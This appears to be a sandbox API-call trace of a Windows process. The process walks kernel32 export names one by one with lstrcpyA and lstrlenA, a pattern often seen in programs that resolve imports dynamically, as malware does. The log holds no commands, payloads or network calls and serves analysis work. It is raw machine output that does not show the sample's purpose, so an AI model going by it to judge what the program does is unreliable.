lpString1="CompareStringEx") returned="CompareStringEx" [0181.014] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0181.014] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0181.014] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0181.014] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0181.014] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0181.014] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0181.014] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0181.014] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0181.014] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0181.014] lstrcpyA (in: lpString1=0x36fce30, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0181.014] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0181.014] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0181.014] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0181.014] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0181.014] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0181.014] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0181.014] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0181.015] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0181.015] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0181.015] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0181.015] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0181.015] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0181.015] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0181.015] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0181.015] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0181.015] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0181.015] lstrlenA (lpString="COPYCONTEXT") returned 11 [0181.015] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0181.015] lstrlenA (lpString="COPYFILEA") returned 9 [0181.015] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0181.015] lstrlenA (lpString="COPYFILEEXA") returned 11 [0181.015] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0181.015] lstrlenA (lpString="COPYFILEEXW") returned 11 [0181.015] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0181.015] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0181.015] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0181.015] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0181.015] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0181.015] lstrlenA (lpString="COPYFILEW") returned 9 [0181.015] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0181.015] lstrlenA (lpString="COPYLZFILE") returned 10 [0181.015] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0181.015] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0181.016] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0181.016] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0181.016] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0181.016] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0181.016] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0181.016] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0181.016] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0181.016] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0181.016] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0181.016] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0181.016] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0181.016] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0181.016] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0181.016] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0181.016] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0181.016] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0181.016] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0181.016] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0181.016] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0181.016] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0181.016] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0181.016] lstrlenA (lpString="CREATEEVENTA") returned 12 [0181.016] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0181.016] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0181.016] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0181.016] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0181.016] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0181.016] lstrlenA (lpString="CREATEEVENTW") returned 12 [0181.016] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0181.016] lstrlenA (lpString="CREATEFIBER") returned 11 [0181.016] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0181.016] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0181.016] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0181.016] lstrlenA (lpString="CREATEFILEA") returned 11 [0181.016] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0181.017] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0181.017] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0181.017] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0181.017] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0181.017] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0181.017] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0181.017] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0181.017] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0181.017] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0181.017] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0181.017] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0181.017] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0181.017] lstrlenA (lpString="CREATEFILEW") returned 11 [0181.017] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0181.017] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0181.017] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0181.017] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0181.017] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0181.017] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0181.017] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0181.017] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0181.017] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0181.017] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0181.017] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0181.017] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0181.017] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0181.017] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0181.017] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0181.017] lstrlenA (lpString="CREATEJOBSET") returned 12 [0181.017] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0181.017] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0181.017] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0181.017] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0181.017] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0181.017] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0181.017] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0181.017] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0181.017] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0181.018] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0181.018] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0181.018] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0181.018] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0181.018] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0181.018] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0181.018] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0181.018] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0181.018] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0181.018] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0181.018] lstrlenA (lpString="CREATEPIPE") returned 10 [0181.018] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0181.018] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0181.018] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0181.018] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0181.018] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0181.018] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0181.018] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0181.018] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0181.018] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0181.018] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0181.018] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0181.018] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0181.018] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0181.018] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0181.018] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0181.018] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0181.018] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0181.018] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0181.018] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0181.018] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0181.018] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0181.018] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0181.018] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0181.018] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0181.018] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0181.018] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0181.018] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0181.019] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0181.019] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0181.019] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0181.019] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0181.019] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0181.019] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0181.019] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0181.019] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0181.019] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0181.019] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0181.019] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0181.019] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0181.019] lstrlenA (lpString="CREATETHREAD") returned 12 [0181.019] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0181.019] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0181.019] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0181.019] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0181.019] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0181.019] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0181.019] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0181.019] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0181.019] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0181.019] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0181.019] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0181.019] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0181.019] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0181.019] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0181.019] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0181.019] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0181.019] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0181.019] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0181.019] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0181.019] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0181.019] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0181.019] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0181.019] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0181.019] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0181.019] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0181.020] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0181.020] lstrcpyA (in: lpString1=0x36fce30, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0181.020] lstrlenA (lpString="CTRLROUTINE") returned 11 [0181.020] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0181.020] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0181.020] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0181.020] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0181.020] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0181.020] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0181.020] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0181.020] lstrlenA (lpString="DEBUGBREAK") returned 10 [0181.020] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0181.020] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0181.020] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0181.020] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0181.020] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0181.020] lstrlenA (lpString="DECODEPOINTER") returned 13 [0181.020] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0181.020] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0181.020] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0181.020] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0181.020] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0181.020] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0181.020] lstrcpyA (in: lpString1=0x36fce30, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0181.020] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0181.020] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0181.020] lstrlenA (lpString="DELETEATOM") returned 10 [0181.020] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0181.020] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0181.020] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0181.020] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0181.020] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0181.020] lstrlenA (lpString="DELETEFIBER") returned 11 [0181.020] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0181.020] lstrlenA (lpString="DELETEFILEA") returned 11 [0181.020] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0181.021] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0181.021] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0181.021] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0181.021] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0181.021] lstrlenA (lpString="DELETEFILEW") returned 11 [0181.021] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0181.021] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0181.021] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0181.021] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0181.021] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0181.021] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0181.021] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0181.021] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0181.021] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0181.021] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0181.021] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0181.021] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0181.021] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0181.021] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0181.021] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0181.021] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0181.021] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0181.021] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0181.021] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0181.021] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0181.021] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0181.021] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0181.021] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0181.021] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0181.021] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0181.021] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0181.021] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0181.021] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 